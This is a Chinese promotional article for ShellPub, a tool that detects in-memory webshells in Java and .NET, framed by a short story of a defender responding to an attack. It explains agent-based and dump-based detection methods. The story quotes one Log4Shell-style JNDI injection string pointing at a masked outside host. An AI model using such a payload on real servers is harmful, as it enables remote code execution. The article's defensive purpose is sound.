这是七月最后一天,与往日并无不同,
同样的桑拿天,同样的炎热。
并不平常,因为你在等一个信号。
虽素未蒙面,但你知道他会来。
信息大屏上各种数据不断更新,一切都显得那么平静。
旁边小哥泡面的香味,引起一阵进食的欲望。
但你只看了一眼桌角贴着的便签,记录着最新的漏洞信息:
就让你抢个先手,但也暴露了你的招式
RCE?!下一招必然会是内存马!
那么工具是冰蝎?抑或哥斯拉?
一年了,你的内存马攻击可有新的变化?
信息大屏上快速闪过几条日志信息,
“来了”,微眯的双眼迅速睁圆,
“172.16.x.xxx”,手指一片飞舞,
话音未落,已经进入相应的主机,
黑底的SSH上跳跃着一行行白色命令:
${jndi:ldap://xxxx.com.cn}
……
果然是内存马,还能有什么新花样!
也接我一招,专破内存马!
几分钟后,屏幕上跳出一行结果。
“重启吧。”你关掉ssh终端,对旁边的甲方小哥说。
“你刚刚用的是ShellPub吗?”
你转过头去,认真地说:“ShellPub,是的,但我更喜欢叫它——河马!”
ShellPub,河马内存马检测工具正式公测:
► Linux版,专用于Java类内存马检测
自动识别包括Tomcat、Weblogic、Jboss 环境;
Spring等打包环境支持手动指定进程方式,因此第三方Java应用(gitlab,ES)都可以检测;
► Windows版
Java内存马检测, Java6+; OA系统、办公系统;
Net内存马,IIS等场景下的.net内存马检测。
全面覆盖内存马常见场景,可检测冰蝎、哥斯拉等内存马利用工具注入的内存马。
河马是如何检测内存马的?
就绝大多数情况而言,内存马的恶意代码并无不同,只是因为位于内存之中,传统工具无法触达而已。既然恶意代码位于内存之中,那就到内存中去找。
但关于在哪儿检测恶意代码,目前有两种方式:
► 在内存中检测
这种方法是将检测的agent注入内存中,Hook关键的类,无论内存马是动态注册,还是基于agent修改字节码,都可以预先被检测agent感知到,然后运行检测代码。
这种方法的优点很明显,即可以做到事前预防,甚至还可以主动阻断内存马的攻击。但缺点同样明显,检测agent在业务JVM中运行,占用计算资源,必然会影响到正常业务逻辑。
► 在内存中找,在硬盘上检测
同样是使用agent技术,进入目标JVM中,遍历筛选可疑的类,然后dump到硬盘,将类字节码反编译为Java代码后,再进行恶意代码检测。
相比前一种检测方法,这种方法相对比较温和,对正常业务的侵入性较弱。
ShellPub河马当前既支持Agent方式检测,也支持无Agent方式检测。
尽管内存马的攻击手段越来越隐蔽,但攻防双方的技术总是螺旋上升的,只要有攻击,必然有防守,专注于Webshell查杀研究的河马也将持续努力,为大家提供使用更简便、检测更精准、高效的内存马检测工具。
**如何获取内存马检测工具:
**
关注SHELLPUB公众号
在后台回复【winmem**】**获取Windows内存马检测工具
在后台回复**【linuxmem】**获取Linux内存马检测工具
获取工具后会得到我们的交流群密码,群里有开发小哥哥为你处理BUG,也有专门的分析师帮你分析内存马样本!
点击下方名片,关注我们
如果不想错过消息,可以星标